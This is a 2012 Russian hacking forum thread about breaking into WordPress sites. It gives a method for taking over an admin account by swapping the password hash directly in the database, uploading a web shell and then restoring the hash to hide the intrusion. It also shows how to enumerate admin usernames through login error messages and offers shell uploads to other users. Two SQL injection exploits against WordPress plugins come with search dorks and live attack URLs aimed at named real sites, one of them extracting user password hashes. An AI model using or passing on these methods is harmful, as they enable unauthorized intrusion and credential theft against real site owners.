
07.08.2012, 12:33
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от WendM
Как можно зайти под админом\залить шел, если
1)Есть доступ к бд = есть логи и пасс(мд5) админа
2)Версия движка 2.5.1
3)Секрет кей не дефолтный
Спасибо заранее
Моя бы схема выглядела так:
1) Есть доступ в бд, но нет расшифрованного пасса? Нет проблем!
Заходим в БД. Пишем запрос
Код:
select password from users where id=1
Запоминаем/записываем хэшик.
Далее запрашиваем
Код:
update users set password='NewPassword' where id=1
NewPassword можно взять из любых расшифрованных ВордПресс хэшей. Например в этом сообщении
2) Проверяем, что у нашего юзверя сменился хэшик в БД.
3) site/wp-login.php - логин мы знаем, пасс расшифрованный тоже. Спасибо ВП что ещё соль не надо апдейтить (хотя это +1 запрос к бд, не новички смогут и 1 запросом апдейт сделать)
4) Так как мы внутри - льём шелл, например так
5) Из-под шелла или ещё где цепляемся в бд и делаем запрос
Код:
update users set password='OldPassword' where id=1
Где OldPassword = старый, сохранённый хэшик.
З.Ы. Прикольно жёлтый цвет на мрачном фоне смотрится =)
|
|
|

07.08.2012, 21:18
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Сообщение от BigBear
Далее запрашиваем
Код:
update users set password='NewPassword' where id=1
не лезит)
|
|
|

09.08.2012, 16:55
|
|
Новичок
Регистрация: 16.07.2012
Сообщений: 2
С нами:
7275926
Репутация:
0
|
|
WendM напиши в личку логин и хеш залью шелл
|
|
|

13.08.2012, 15:50
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами:
7552406
Репутация:
724
|
|
Помошник брута
Дело в том что, чем дальше я влажу в ядро движка, тем больше радуюсь тому, что билдеры как-будто специально оставляют нам шансы на проникновение. Сегодня обратил внимание на wp-login.php
Дело в том, что WP позволяет отображать ник, как того пожелает сам автор, отнюдь, не всегда админ использует логин "admin". Довольно часто приходится брутить... Но как же брутить, если мы не знаем логин админа? В этом нам помогает движок. Дело в том, что скрипт сам помогает нам найти логин админа с помощью того же брута. Возьмем случайны блог и гугла.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//domashenko.ru/wp-login.php[/COLOR][/COLOR]
Введем в качестве логина "superuser", а в качестве пасса "123". На что получим подсказку, что юзера с ником "superuser" в базе нет....
Введем логин "admin" и пароль к примеру "test", в результате получаем:
Конечно не новшество, но мне частенько пригождается.
|
|
|

14.08.2012, 22:04
|
|
Новичок
Регистрация: 28.10.2010
Сообщений: 5
С нами:
8178806
Репутация:
0
|
|
Сообщение от VY_CMa
Сегодня обратил внимание на wp-login.php
пригождается.
Один из первых шагов по безопасности Wordpress смена страницы входа в админку - wp-login.php
|
|
|

16.08.2012, 12:28
|
|
Новичок
Регистрация: 15.08.2012
Сообщений: 1
С нами:
7232726
Репутация:
0
|
|
Подскажите пожалуйста, как использовать полученные при помощи программы WP_Cracker логин и хэш? чтобы редактировать сайт
|
|
|

16.08.2012, 20:51
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Planet85
Подскажите пожалуйста, как использовать полученные при помощи программы WP_Cracker логин и хэш? чтобы редактировать сайт
Как создатель софтины - советую прочитать отдельную тему по ней тут
|
|
|

05.09.2012, 00:44
|
|
Новичок
Регистрация: 11.10.2010
Сообщений: 0
С нами:
8203286
Репутация:
0
|
|
вопрос, есть админка, темы и плагины нельзя с неё редактировать.
какие еще методы есть чтоб залить шел? вп 3.4.1
|
|
|

02.10.2012, 03:20
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
С нами:
8467184
Репутация:
1
|
|
fs real estate plugin SQL-Inj
# Exploit Title: fs real estate plugin SQL-Inj
# Date: Oct 2, 2012
#Exploit Author: z0mbyak
# Vendor Homepage: find by yourself
# Software Link: find by yourself
# Version: don't know
# Tested in: web
# Dork: inurl:"marker_listings.xml?id"
# Exploit: -2+union+select+version(),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31--
# PoC:
http://themacnabs.com/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-2+union+select+version(),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31--
P.S. Кол-во колонок может отличаться...
P.P.S. Мб, боян, по wp не работаю)
|
|
|

19.10.2012, 20:31
|
|
Познающий
Регистрация: 31.10.2011
Сообщений: 35
С нами:
7648886
Репутация:
5
|
|
# Exploit Title: ripe-hd-player SQL-Inj
# Date: 19.10.2012
# Exploit Author:ukrpunk
# Vendor Homepage: find by yourself
# Software Link: find by yourself
# Version: don't know
# Tested in: web
# Dork:inurl:"/plugins/ripe-hd-player"
# Exploit:-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_use rs--
# PoC: http://www.fitness-bucuresti.ro/wp-content/plugins/ripe-hd-player/config.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_use rs--
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|